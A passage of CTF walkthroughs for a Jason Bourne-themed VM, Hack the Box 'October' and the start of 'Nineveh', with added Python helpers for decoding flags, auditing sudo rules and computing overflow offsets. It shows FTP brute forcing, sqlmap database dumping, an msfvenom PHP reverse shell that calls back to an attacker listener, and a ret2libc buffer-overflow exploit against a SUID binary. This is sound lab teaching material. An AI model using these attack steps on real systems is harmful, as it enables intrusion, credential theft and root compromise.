VM Difficulty Level: Beginner/Intermediate
Penetrating Methodology
- Network scanning (Nmap, netdiscover)
- Information gathering
- Abusing the web browser for the 1st flag
- Generate a dictionary (CeWL)
- FTP brute-force (Hydra)
- FTP login for the 2nd flag
- SQL injection for the 3rd flag
- Blackmarket login for the 4th flag
- SquirrelMail login for the 5th flag
- Get the ciphered mail from inside INBOX.Drafts
- Decipher the mail and reach backdoor.php
- Upload a backdoor shell
- Netcat session for the 6th flag
- Python one-liner for a proper TTY shell
- Sudo rights privilege escalation
- Get root access and capture the flag
Let's start by getting the IP of the VM (here I have it at 192.168.1.104, but you will have to find your own).
```
netdiscover
```
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-hq1yBhKA_cs/WzcrDIDYoaI/AAAAAAAAXvA/2AbmGEuGwMwC9uc1Q1jrr3TQuas-0xGnQCEwYBhgL/s1600/1.png?w=687&ssl=1)
Now let's move on to enumeration, to identify the running services and open ports on the victim's machine, using the most popular tool for this, Nmap.
```
nmap -A 192.168.1.104
```
As you can observe it has dumped a lot of details related to open ports and services running through them.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-fZNSg24zqw8/WzcrGIGRJzI/AAAAAAAAXvQ/WgmJT296PoUfzVszKAYDHczsB4Isiaz2wCEwYBhgL/s1600/2.png?w=687&ssl=1)
Knowing port 80 is open on the victim's machine, I preferred to explore its IP in a browser. It put up a Blackmarket login page, but we don't have credentials yet, so we view its source code to look for a clue.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ec3G7UJlTTE/WzcrHudS1GI/AAAAAAAAXvQ/lnBwDX9g3hsKPXvSvRts08d33sFfsbXVQCEwYBhgL/s1600/3.png?w=687&ssl=1)
BOOOMMM!! Luckily I found the 1st flag from its source code which was in base64.
flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-FKiy1W89vDc/WzcrI1ag31I/AAAAAAAAXvM/x4RraHFDtFswbRpGkq8WBMlvsfOxXNIAwCEwYBhgL/s1600/4.png?w=687&ssl=1)
Since the 1st flag was base64 encoded, we decode it with the following syntax.
```
echo 'base64 encoded text' | base64 -d
```
WoW!! It reads CIA Operation Treadstone.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-n6sJ4BBC11E/WzcrJGk81sI/AAAAAAAAXvU/ldJ9HnCWOAYlRU3t9MJa1F-R3LsjMh00wCEwYBhgL/s1600/5.png?w=687&ssl=1)
With help of Google I found an article on it (link elided in the source), and after reading the whole article it became clear to me what CIA Operation Treadstone is all about and why flag 1 held it secretly. Black-market login credentials might be extracted from here, therefore I decided to generate a dictionary with the help of the 'Jason Bourne' movie's characters. By executing the following command we generated a wordlist to serve as both username and password dictionary and saved it as dict.txt.
```
cewl <URL elided in source> -d 2 -w /root/Desktop/dict.txt
```
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-s9wxxBSh2YU/WzcrJReAyDI/AAAAAAAAXvM/4aw1ufmRfzYZcm4zpi68e9wy1MkJS7zpACEwYBhgL/s1600/6.png?w=687&ssl=1)
As we knew port 21 (FTP) is open, we use the above dictionary for an FTP brute-force attack with the help of Hydra.
```
hydra -L dict.txt -P dict.txt 192.168.1.104 ftp
```
Successfully found FTP-login user: nicky password: CIA
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-sOx8Mi-uv9I/WzcrJXkfKdI/AAAAAAAAXvQ/n59w_lWQJKouiGVDDVnqk5J098qL9sJjgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Then with the help of the above credentials we logged into FTP, found IMP.txt inside /IMPFiles and downloaded it with the following commands.
```
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get IMP.txt
```
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-UK-Qs87Jnmw/WzcrJ0VyRQI/AAAAAAAAXvY/sQmczx3pO1UGL7eFXLHWBq7zO1nqs1aSwCEwYBhgL/s1600/8.png?w=687&ssl=1)
With the help of the cat command we opened the IMP.txt file and found flag2 inside it. We also read the message it contains and analysed the hint it gives: "CIA blackmarket Vehicle workshop".
```
cat IMP.txt
```
flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vW0j841aMnE/WzcrKHOuShI/AAAAAAAAXvU/WbCC9ZcPe7AKH5V2gvwM7ODJ0Sge7i7UgCEwYBhgL/s1600/9.png?w=687&ssl=1)
Looking at the above hint I focused on "Vehicle workshop" and started trying every plausible directory name involving vehicle/workshop in the web browser, and I retrieved the following web page when I tried the URL (elided in the source).
It was a dashboard of the Black-Market Auto Workshop.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NGC1k2tG-Ao/WzcrDfI7NcI/AAAAAAAAXvY/bdw0RV-xsgUgExSXTFBVxlhtA_GDQSgUgCEwYBhgL/s1600/10.png?w=687&ssl=1)
After examining the whole dashboard we checked out the Spare Parts page and observed its contents and URL. So we decided to use sqlmap against it for SQL injection.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ccipPlDegKE/WzcrDT7ILFI/AAAAAAAAXvM/jAE29bWS7tAAanLKrGPdDU3ndeC41fiKgCEwYBhgL/s1600/11.png?w=687&ssl=1)
Then we execute the following command to fetch the database names with the help of sqlmap.
```
sqlmap -u <URL elided in source> --dbs --batch
```
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-HX4dfotEsQk/WzcrD8s5GHI/AAAAAAAAXvY/dt31SAtbA1keRW2ePIn0WvyvIcHmuCuKgCEwYBhgL/s1600/12.png?w=687&ssl=1)
Here I found some database names, and in my judgement the relevant one should be blackmarket, therefore without wasting time I stepped ahead to fetch the tables inside it.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-uGTn8aYmMZM/WzcrEIqMFeI/AAAAAAAAXvQ/_U0hSf5eZOgOn8fVDPODb1AjTGWMHIz3wCEwYBhgL/s1600/13.png?w=687&ssl=1)
```
sqlmap -u <URL elided in source> -D BlackMarket --dump-all --batch
```
Here I found a table "flag" and captured the 3rd flag from it.
Flag3 Find Jason Bourne Email access.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-mIcETt6_CUo/WzcrELXhSgI/AAAAAAAAXvI/tZhapJA_7OIdXsIBRqFJ1980QlNQKS8egCEwYBhgL/s1600/14.png?w=687&ssl=1)
Then we fetched the table "user" and found usernames with their password hashes.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-gguhGsHXrrs/WzcrEl_5pmI/AAAAAAAAXvU/PuyaMCbCh3AXzaQQHQIYJRhbeOch33MDACEwYBhgL/s1600/15.png?w=687&ssl=1)
With the help of an online MD5 lookup tool we resolved the above-enumerated hashes and found the following.
Username: admin |password: cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA
Username: user |password: 0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YV325MqoLk4/WzcrE1HMIlI/AAAAAAAAXvI/yn13enJiiHULtZbU_k3b8WTuxXIvJphdwCEwYBhgL/s1600/16.png?w=687&ssl=1)
Then again we explore the target IP in the browser and enter the following credentials to log in.
```
admin
BigBossCIA
```
It put up a pop-up with flag 4 along with a message, as shown.
flag4{bm90aGluZyBpcyBoZXJl}
Jason Bourne Email access ?????
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jr5z3mNVtbo/WzcrFMtGWhI/AAAAAAAAXvE/MT-rpy6cnWUF1xOmlT176lXA3R22PocqgCEwYBhgL/s1600/17.png?w=687&ssl=1)
From inside Customers, I got the email ID [email protected] of user Jason Bourne.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-pE6CCswgfdE/WzcrFOwTbsI/AAAAAAAAXvQ/0E8phcgpA2AAwgQy3iv4miYc5nPf29f5gCEwYBhgL/s1600/18.png?w=687&ssl=1)
At this stage I decided to use Dirb for a directory brute-force attack; here we notice /squirrelmail/, and for sure we are going to get something from here.
![[Image: 19.1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-7znsPB6s6w4/WzcrFl7nB5I/AAAAAAAAXvY/mgO7ydJTcbkuYAafZ18H8B-Zdb9W5IaMACEwYBhgL/s1600/19.1.png?w=687&ssl=1)
So we explore the SquirrelMail URL (elided in the source) and enter the credentials given below, as described in the 4th flag (Jason Bourne Email access ?????).
```
Username: [email protected]
Password: ?????
```
It gives the following mailbox as shown and I start further enumeration.
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-xlqj3fSsKf8/WzcrF1UD9cI/AAAAAAAAXvU/WSIcFP5_NFYB3QXyUcs2wFoVgw9KcHpQQCEwYBhgL/s1600/19.png?w=687&ssl=1)
Then, while inspecting INBOX.Drafts, I found the 5th flag inside the IMPORTANT MESSAGE mail.
Flag5 {RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
After reading it we find some encoded text which needs to be decoded.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YdtJp9I3Nxo/WzcrGctT5LI/AAAAAAAAXvE/QazLKHabtps-VYrA-3uYfqA7U_3s67IUQCEwYBhgL/s1600/20.png?w=687&ssl=1)
Then I decoded the above text as shown, and after reading it I concluded that there should be a "passpass.jpg" under a directory /kgbbackdoor inside the Blackmarket workshop which will take us to the actual backdoor.
![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-vtz_AXID4Uo/WzcrGmddYHI/AAAAAAAAXvY/CIihSipHA3Qnn9Pr3ktco-mQH5xZcVsNQCEwYBhgL/s1600/21.png?w=687&ssl=1)
So without wasting time I looked for the above-said path (URL elided in the source).
hhheheyy!!! This image must be hiding something inside; let's download it.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-jfZB0M_CFNg/WzcrGxINo4I/AAAAAAAAXvI/OmJFhfjNR4cuEqGk43hXbtameNFOMGxcQCEwYBhgL/s1600/22.png?w=687&ssl=1)
Then I used the strings tool with the following command to extract the printable strings (including any metadata) from inside it.
```
strings PassPass.jpg
```
Here we found something interesting.
```
Pass = 5215565757312090656
```
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-tfLxUfkIgzE/WzcrG3OGfAI/AAAAAAAAXvY/-meiC_hizRsysRCnoTca5o_0bMrujC8MACEwYBhgL/s1600/24.png?w=687&ssl=1)
Since the extracted "Pass" string could be the password we need for the next step, we tried to decode it. As it was in decimal format (5215565757312090656), we first converted it to hex (4861696C4B474220) and then decoded the hex as ASCII, obtaining "HailKGB".
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-OaX_f5qrxFA/WzcrHKpLrLI/AAAAAAAAXvQ/pdqZhal98Ao3du3zc0qjdOVRpFz-W9AEgCEwYBhgL/s1600/25.png?w=687&ssl=1)
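The two decodings used in this write-up, as an added Python example (this code is not from the original post): the base64 flags are decoded the same way `echo '...' | base64 -d` does it, and the decimal "Pass" value from PassPass.jpg is read as a big-endian integer, shown as hex, and converted byte by byte to ASCII as described above. The flag strings and the Pass value are the ones printed on this page; nothing else is assumed.

```python
import base64

# Flag bodies exactly as they appear in this walkthrough (the base64 between the braces).
FLAGS = {
    "flag1": "Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=",
    "flag2": "Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy",
    "flag4": "bm90aGluZyBpcyBoZXJl",
    "flag5": "RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=",
    "flag6": "Um9vdCB0aW1l",
}

# The "Pass" value that `strings PassPass.jpg` revealed.
PASS_DECIMAL = 5215565757312090656


def decode_flag(encoded: str) -> str:
    """Decode one base64 flag body to text, like `echo '...' | base64 -d`.

    validate=True rejects characters outside the base64 alphabet, so a flag
    copied with stray quotes or whitespace fails loudly instead of silently
    decoding to garbage.
    """
    return base64.b64decode(encoded, validate=True).decode("utf-8")


def decode_all_flags(flags: dict) -> dict:
    return {name: decode_flag(body) for name, body in flags.items()}


def decimal_to_hex(value: int) -> str:
    """Upper-case hex digits of the integer, no 0x prefix (4861696C4B474220)."""
    return format(value, "X")


def decimal_to_ascii(value: int) -> str:
    """Treat the integer as a big-endian byte string and decode it as ASCII.

    Every two hex digits form one byte: 0x48='H', 0x61='a', 0x69='i', 0x6C='l',
    0x4B='K', 0x47='G', 0x42='B', 0x20=' '. The trailing 0x20 is a space, so
    the raw result is "HailKGB " and it is returned unstripped on purpose.
    """
    length = (value.bit_length() + 7) // 8
    return value.to_bytes(length, "big").decode("ascii")


if __name__ == "__main__":
    for name, text in decode_all_flags(FLAGS).items():
        print(f"{name}: {text}")
    print("hex  :", decimal_to_hex(PASS_DECIMAL))
    print("ascii:", repr(decimal_to_ascii(PASS_DECIMAL)))
```

The last byte of 0x4861696C4B474220 is 0x20, a space, so the password the page quotes as "HailKGB" is really "HailKGB " before stripping; the function keeps the space so the discrepancy is visible rather than hidden, and the caller decides whether to strip it.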
Slowly and gradually we are moving towards our goal, and it is getting more and more hectic for me. After penetrating further I reached the following URL (elided in the source), where you will find a Page Not Found error message.
BANG ON: it is an illusion, because on this page you will get a hidden login form, as declared in the encrypted mail. If you still have any confusion, read the decoded message drop for Dimitri above one more time and everything will be clear.
![[Image: 28.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aMf8g52t2kc/WzcrHUFqUVI/AAAAAAAAXvM/lV5VQ09mRYEEZwJJTVNzFzJesx2xWhJpQCEwYBhgL/s1600/28.png?w=687&ssl=1)
B0000MMM!!! Here we have accessed the backdoor that the sender told Dimitri about.
![[Image: 29.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-PGvZNkyHUAI/WzcrHtusfSI/AAAAAAAAXvQ/b0vWPLTSwRIbqutQH7f1JOCukUTq8ow8gCEwYBhgL/s1600/29.png?w=687&ssl=1)
Now let's enter the attacker IP 192.168.1.107 and listening port 4444, then start a netcat listener in a new terminal to receive the victim's reverse connection.
```
nc -lvp 4444
```
![[Image: 31.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-fXR2DkPeSwo/WzcrH0JSfBI/AAAAAAAAXvM/R9hFtcdU3KwIrKmQg1M3g4hPMuXfPDUpgCEwYBhgL/s1600/31.1.png?w=687&ssl=1)
With the help of netcat we successfully spawned a pty shell on the victim's VM, then opened flag.txt with cat and found the 6th and last flag of this VM. Now we need root access to finish the challenge.
```
cat flag.txt
flag6{Um9vdCB0aW1l}
cd /home
ls -al
cd .Mylife
ls -al
cat .Secret
```
While reading the message I noticed something striking, i.e. DimitriHateApple; because the file is named .Secret, I took DimitriHateApple as the password for the user Dimitri.
![[Image: 31.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-feprku9JGsw/WzcrIG_jPQI/AAAAAAAAXvY/arO7hSq4n_4rPf3vQypDX5g4KdZIMYW6ACEwYBhgL/s1600/31.png?w=687&ssl=1)
Then I tried to log in as Dimitri, and for that I executed the following commands to get a proper terminal first.
```
python -c 'import pty; pty.spawn("/bin/bash")'
su dimitri
DimitriHateApple
```
Great!!! We logged in successfully; now let's try privilege escalation for root access.
I was shocked when I checked the sudo rights for user Dimitri, because I noticed ALL privileges are allotted.
```
sudo -l
(ALL : ALL) ALL
sudo su
```
Yehhh!! We own root access.
![[Image: 32.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-hRT65DrRsc0/WzcrIddpnpI/AAAAAAAAXvI/Td4ADFScz_gFFLlSnZ4XI_c7CrqCa99XwCEwYBhgL/s1600/32.png?w=687&ssl=1)
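The check a defender would run for the finding above, as an added Python example (not part of the original write-up): a small audit of `sudo -l` output that flags the `(ALL : ALL) ALL` grant Dimitri has and distinguishes it from narrower rules. The sample output lines are constructed for this example, and the hostname in the banner line is made up.

```python
import re

# Constructed sample of `sudo -l` output. The first rule is the one found on
# the VM above; the others are made-up entries for comparison.
SAMPLE_SUDO_L = """\
User dimitri may run the following commands on examplehost:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/systemctl restart nginx
(root) /usr/bin/vim
(www-data) NOPASSWD: /usr/sbin/service apache2 reload
"""

# "(runas_user : runas_group) [TAG:] command[, command...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Binaries that can spawn a shell or read/write arbitrary files even when
# sudo is "restricted" to them, so the restriction is cosmetic.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "python", "perl", "bash", "sh"}


def parse_sudo_rule(line: str) -> dict:
    """Parse one rule line as printed by sudo -l."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised sudo -l line: {line!r}")
    tags = [t.strip(": ") for t in m.group("tags").split(":") if t.strip()]
    return {
        "runas": m.group("runas").strip(),
        "tags": tags,
        "commands": [c.strip() for c in m.group("cmds").split(",")],
    }


def rate_rule(rule: dict) -> str:
    """Classify a parsed rule.

    full-root:     the user may run any command; equivalent to owning root.
    shell-capable: a named command that still yields a shell (editor, pager,
                   interpreter), so the rule is root by another name.
    restricted:    a specific command; still worth review, but the intended shape.
    """
    if rule["commands"] == ["ALL"]:
        return "full-root"
    for cmd in rule["commands"]:
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            return "shell-capable"
    return "restricted"


def audit_sudo_output(text: str) -> list:
    """Return (rule line, rating, nopasswd) for every rule in sudo -l output."""
    findings = []
    for line in text.splitlines():
        if not line.strip().startswith("("):
            continue  # the "User x may run..." banner and blank lines
        rule = parse_sudo_rule(line)
        findings.append((line.strip(), rate_rule(rule), "NOPASSWD" in rule["tags"]))
    return findings


if __name__ == "__main__":
    for line, rating, nopasswd in audit_sudo_output(SAMPLE_SUDO_L):
        print(f"{rating:14} nopasswd={nopasswd!s:5} {line}")
```

Anything rated full-root or shell-capable is the escalation path shown above: `sudo su` (or an editor's shell escape) goes straight to uid 0, so the fix is to replace such grants with the specific, non-interactive commands the user actually needs.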
```
cd /root
ls
cat THEEND.txt
```
HURRAYYYY!!!! We finished this challenge.
Happy Hacking
![[Image: 33.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-h77hhuDiKtw/WzcrIXoMeZI/AAAAAAAAXvU/AKpKXlWDFn0dzSjdl3iAaYrrivY1-JOSgCEwYBhgL/s1600/33.png?w=687&ssl=1)
Hello friends!! Today we are going to solve another CTF challenge, "October", which is available online for those who want to increase their skills in penetration testing and black-box testing. October is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online they have static IPs; this one's IP is 10.10.10.16, so let's begin with nmap port enumeration.
```
nmap -sV 10.10.10.16
```
From the image given below you can observe that ports 22 and 80 are open on the target system.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-LCgOnPbp9Kw/WzXnnp46QBI/AAAAAAAAXn0/up5hmTv62KU2OM7XFEBAErqqFh9f5VlqgCEwYBhgL/s1600/1.png?w=687&ssl=1)
As port 80 is running an HTTP server, we open the target machine's IP address in our browser and find that it is running October CMS.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zXzaxIlmmg4/WzXnrh5mbEI/AAAAAAAAXoE/htFeelFtC5QmIk8h1A9k0tHV9Yup6_bLQCEwYBhgL/s1600/2.png?w=687&ssl=1)
We go to the default admin login page for October CMS (URL elided in the source).
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qthhx8uIhsE/WzXnrBVG3qI/AAAAAAAAXoE/YINUvEeXEl0MH38nHKuSPypu4CL-tnXQACEwYBhgL/s1600/3.png?w=687&ssl=1)
We can log in to this CMS with the default credentials: Username: admin, Password: admin.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-YCo5khE4wTc/WzXnrx-zPpI/AAAAAAAAXn8/ckwTAXZYWdkewTIfPzDokMZTWkMZPf9MwCEwYBhgL/s1600/4.png?w=687&ssl=1)
And we got admin access to October CMS. Now, to get a reverse shell, first rename your PHP payload to '.php5'. We use msfvenom to create a PHP payload and save it as shell.php5.
```
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw > shell.php5
```
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-lpXDfMOvXDc/WzXnsJkqU2I/AAAAAAAAXoA/Kw7h8WCliNoDaWM040DevWaJPJ4_Zk24gCEwYBhgL/s1600/6.png?w=687&ssl=1)
After creating the payload we set up our listener using Metasploit.
```
msf > use exploit/multi/handler
msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf > exploit(multi/handler) > set lhost 10.10.14.25
msf > exploit(multi/handler) > set lport 4444
msf > exploit(multi/handler) > run
```
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-qshuJcL5qLE/WzXnsTUWrHI/AAAAAAAAXoI/DQXEMFeLya4hkVMbN5hy_OL0JYlnU1rDwCEwYBhgL/s1600/7.png?w=687&ssl=1)
Now click on Media in the top toolbar, upload your PHP reverse shell, and click on the public link on the right side.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/--Wns8uo1XX0/WzXnsolPpUI/AAAAAAAAXoI/v99dbkHK08sXCGRTYhMzOm30XXmyDhPYwCEwYBhgL/s1600/8.png?w=687&ssl=1)
As soon as we click on the link we get our reverse shell. We use the sysinfo command to check the system information of the target machine.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-WDC0y_5H92s/WzXnsq-MzbI/AAAAAAAAXoI/7qvn28jd_scAczJdZY-dIMnJBTlF5xxegCEwYBhgL/s1600/9.png?w=687&ssl=1)
Now spawn a tty shell and look for binaries on the system with the SUID bit set.
```
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
```
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/--AXQw1UyGTo/WzXnnwGdNbI/AAAAAAAAXn0/EXX0g_HxAYs5qAm_UWISC7TR2lDys7KVQCEwYBhgL/s1600/10.png?w=687&ssl=1)
We find a binary called ovrflw that has the SUID bit set. We download the file to our system using meterpreter.
```
meterpreter > download /usr/local/bin/ovrflw /root/Desktop
```
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-mN3OTblzl_E/WzXnn72wBJI/AAAAAAAAXn0/2ukE0EVWSyonib_dpN1NLJ_tOBlsFSz2wCEwYBhgL/s1600/11.png?w=687&ssl=1)
We open the file in gdb and take a look at the disassembly. At main+64 we find a call to strcpy; as strcpy copies without any length check and is therefore prone to buffer overflow, we try to exploit it.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-AQIUscaWEuU/WzXnovIWIyI/AAAAAAAAXn4/OT5N_9O31ukMq8ZpitRDqTRidcgQSGzSgCEwYBhgL/s1600/12.png?w=687&ssl=1)
First we create a 150-byte string to find the EIP offset, using the pattern_create script.
```
./pattern_create.rb -l 150
```
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-JIaR5Ki2VCA/WzXno_8-RII/AAAAAAAAXn8/056FQvfBsL0PmpYaMVTU8Aj4O8Kv_dDaACEwYBhgL/s1600/13.png?w=687&ssl=1)
We run the file in gdb with the 150-byte pattern as the argument and find that the EIP register was overwritten with 0x64413764.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-57-0pjG9HBg/WzXno5fuX2I/AAAAAAAAXoA/8CGjzQMZ5PMnALJuWp-lXEjXO8favQTKgCEwYBhgL/s1600/14.png?w=687&ssl=1)
We pass that value into /usr/share/metasploit-framework/tools/pattern_offset.rb and get an offset of 112. So we need to write 112 characters and then the address of the instructions we want executed.
```
./pattern_offset.rb -q 64413764 -l 150
```
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-EvVywZdU8TA/WzXnpMB17YI/AAAAAAAAXoE/9Gw1LRw8-zk-8uEod7ld13uf4bBrjehlgCEwYBhgL/s1600/15.png?w=687&ssl=1)
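Why the overwritten EIP value maps to offset 112, as an added Python example (not from the write-up): it rebuilds the same cyclic pattern `pattern_create.rb` emits and searches it for the little-endian bytes of the crashed register value, which is what `pattern_offset.rb -q 64413764` computes. Only values already on this page (length 150, value 0x64413764) are used.

```python
import string


def cyclic_pattern(length: int) -> bytes:
    """Generate the Metasploit-style pattern 'Aa0Aa1Aa2...Aa9Ab0...'.

    Each triple is upper+lower+digit, so every 4-byte window is unique within
    the first 26*26*10*3 = 20280 bytes; that uniqueness is what lets one
    overwritten register value be mapped back to a single input offset.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value: int, length: int = 150) -> int:
    """Map a crashed 32-bit register value back to its offset in the pattern.

    gdb prints EIP as 0x64413764, but x86 is little-endian, so the bytes that
    were actually on the stack are the reverse: 64 37 41 64 = b"d7Ad".
    Returns -1 if those bytes do not occur in the pattern (the crash value
    did not come from our input).
    """
    needle = value.to_bytes(4, "little")
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    print(cyclic_pattern(150).decode())
    # 0x64413764 sits at offset 112, matching pattern_offset.rb above
    print("offset:", pattern_offset(0x64413764, 150))
```

The search is on raw bytes in input order, so the value must be byte-swapped exactly once (done by `to_bytes(..., "little")`); passing the hex digits as a string, or swapping twice, gives -1 or a wrong offset. A result of -1 on a real crash usually means the register was clobbered by something other than the supplied argument.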
When we try to place shellcode in the buffer we are unable to execute it because of DEP, which prevents code on the stack from being executed. So instead we do a ret2libc attack, reusing code already present in the process's executable memory. On the target machine we find that ASLR is enabled, so we will have to brute-force the address. Now we find the addresses of system, exit and the string /bin/sh.
```
gdb /usr/local/bin/ovrflw -q
(gdb) b main
(gdb) run
(gdb) p system
(gdb) find 0xb75bd310, +9999999, "/bin/sh"
(gdb) x/s 0xb76dfbac
(gdb) p exit
```
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-P8gqFFzOcd8/WzXnpvohJxI/AAAAAAAAXn4/Ewr6T_XEWWc7PnuHBHizshaXG1h8jfppgCEwYBhgL/s1600/16.png?w=687&ssl=1)
Now we create our exploit, brute-forcing the address from bash because of ASLR. We arrange the addresses in the order system > exit > /bin/sh, and we get a root shell as soon as a guess matches the real memory address.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-6ByyxwoZAF8/WzXnp4Au6NI/AAAAAAAAXoE/E_4lvirhoCYrJ1Ve_ec-PwW5Wa-2BmCOACEwYBhgL/s1600/17.png?w=687&ssl=1)
After getting the root shell we move to the /root directory and find a file called root.txt; we open the file and find the first flag.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tacWzyYHj_c/WzXnqk0xztI/AAAAAAAAXoE/TrXQCGgyvzYYGYaAAN6CGg_WA1X-jamTQCEwYBhgL/s1600/19.png?w=687&ssl=1)
After finding the first flag we go to the /home/ directory and find a directory called harry/. Inside harry we find a file called user.txt; we open it and find our final flag.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-NSdX4fqD-I8/WzXnrK8c2EI/AAAAAAAAXoI/Sz9uGtfsOxkkO-mZF_9CMPPPU_vxlofwQCEwYBhgL/s1600/20.png?w=687&ssl=1)
Today we are going to solve another CTF challenge, "Nineveh", which is categorised as a retired lab presented by Hack the Box for online penetration practice.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Penetration Methodology
Scanning
- Open port and running services (Nmap)
- Enumerating Web Directories (Dirb)
- Brute force on PHPliteAdmin (Burp Suite)
- Spawning Shell (Metasploit)
- Get user.txt
- User.txt
Scanning
Since these labs are accessible online they have static IPs. The IP of Nineveh is 10.10.10.43, so let's start with nmap port enumeration.
```
nmap -A 10.10.10.43
```
It enumerated ports 80 and 443 as open.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Kw0zf_sGwVQ/WzM6uKXRW7I/AAAAAAAAXjE/4jHlHRZitQMNkQjtRPA76IytmKpAki0aACEwYBhgL/s1600/1.png?w=687&ssl=1)
We explored port 80 but didn't observe any remarkable clue for the next step.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-3X1hB90mnC8/WzM6wJJlLRI/AAAAAAAAXkg/7KXyXbOK03E9T1xjZuBOaf79zNDJcLwqACEwYBhgL/s1600/2.png?w=687&ssl=1)
Enumeration
So next we use the dirb tool of Kali to enumerate the directories, found some important ones (the output is elided in the source), and then went to the web browser to explore them.
```
dirb <URL elided in source> /usr/share/wordlists/dirb/big.txt
```
